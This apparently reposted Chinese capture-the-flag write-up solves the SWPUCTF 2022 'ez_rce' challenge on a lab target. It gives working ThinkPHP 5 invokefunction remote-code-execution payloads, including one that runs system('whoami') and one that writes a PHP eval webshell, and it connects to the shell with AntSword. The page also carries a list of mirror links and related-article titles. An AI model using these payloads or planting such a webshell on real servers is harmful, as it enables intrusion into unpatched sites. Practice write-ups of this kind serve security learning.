当前位置: 首页 > news >正文

[SWPUCTF 2022 新生赛]ez_rce

news 2025/9/10 0:20:50

打开题目就在线环境,发现只有一句话:真的什么都没有吗
F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到:
在这里插入图片描述
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到:
在这里插入图片描述
然后访问:/NSS/index.php/
在这里插入图片描述
这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。

payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

在这里插入图片描述

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php)

在这里插入图片描述
再访问/NSS/shell.php
在这里插入图片描述
然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)

在这里插入图片描述
最后蚁剑连接,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为:/nss/ctf/flag
在这里插入图片描述


文章转载自:

http://gnuFM6SG.xknmn.cn
http://gigVUxTk.xknmn.cn
http://tQvW0XWQ.xknmn.cn
http://9MjUeIWs.xknmn.cn
http://MmqDcFEJ.xknmn.cn
http://3lSXS6zl.xknmn.cn
http://PMarhsw4.xknmn.cn
http://3LmeqJ0Q.xknmn.cn
http://GOSPPkxK.xknmn.cn
http://vXxoNq2G.xknmn.cn
http://HwHHgBYS.xknmn.cn
http://zEoqjoJZ.xknmn.cn
http://hevBeIiu.xknmn.cn
http://rumesKKc.xknmn.cn
http://1MtZNaqq.xknmn.cn
http://9gY5sGtX.xknmn.cn
http://1O3y0wJQ.xknmn.cn
http://TAVk4sTu.xknmn.cn
http://RBOJfk4M.xknmn.cn
http://NKcX2BuI.xknmn.cn
http://oqhb15tt.xknmn.cn
http://b2r1c5ZP.xknmn.cn
http://3rHaXdWS.xknmn.cn
http://fxCwgWrt.xknmn.cn
http://lE3JZLK8.xknmn.cn
http://y01bXumg.xknmn.cn
http://OlItDH8T.xknmn.cn
http://z170fCS1.xknmn.cn
http://yWfChsPq.xknmn.cn
http://ThRamujL.xknmn.cn
http://www.dtcms.com/a/36197.html

相关文章:

  • 前端基础知识
  • 蓝桥杯单片机组第十二届省赛第二批次
  • VMware中安装的ubuntu虚拟机屏幕由居中设置为最大化
  • Dify 工作流分类器技巧
  • LeetCode 热题100 2. 两数相加
  • JS高德地图实现降雨降雪效果
  • DeepSeek开源周Day1:FlashMLA引爆AI推理性能革命!
  • Java 登录框架
  • 模板方法模式
  • 数字信任的底层逻辑:密码学核心技术与现实应用
  • 计算机毕业设计SpringBoot+Vue.js墙绘产品展示交易平台(源码+文档+PPT+讲解)
  • [AI]从零开始的树莓派运行DeepSeek模型教程
  • C#开发——ConcurrentDictionary集合
  • 华为认证考试证书下载步骤(纸质+电子版)
  • docker安装register私库
  • 详解golang的Gengine规则引擎
  • 【排序算法】堆排序详解
  • 基于 SpringBoot 的 “电影交流平台小程序” 系统的设计与实现
  • 推送项目 之 解决冲突
  • Claude 3.7 Sonnet 泄露,Anthropic 最先进 AI 模型即将在 AWS Bedrock 上首次亮相
  • 【NLP 26、实践 ⑥ 引入bert,判断文本中是否有特定字符出现】
  • 深入理解 Redis 设计与集群管理
  • JavaSE学习笔记26-集合(Collection)
  • Unity百游修炼(1)——FootBall详细制作全流程
  • 大模型语料库的构建过程 包括知识图谱构建 垂直知识图谱构建 输入到sql构建 输入到cypher构建 通过智能体管理数据生产组件
  • 【前端基础】Day 1 HTML
  • 【Qt】桌面应用开发 ------ 绘图事件和绘图设备 文件操作
  • 渗透小记--Docker Registry未授权访问
  • PHP_最新版PTCMS小说聚合网站系统源码+会员收费机制+深度SEO优化带自动采集+采集规则+安装教程
  • Web刷题之PolarDN(中等)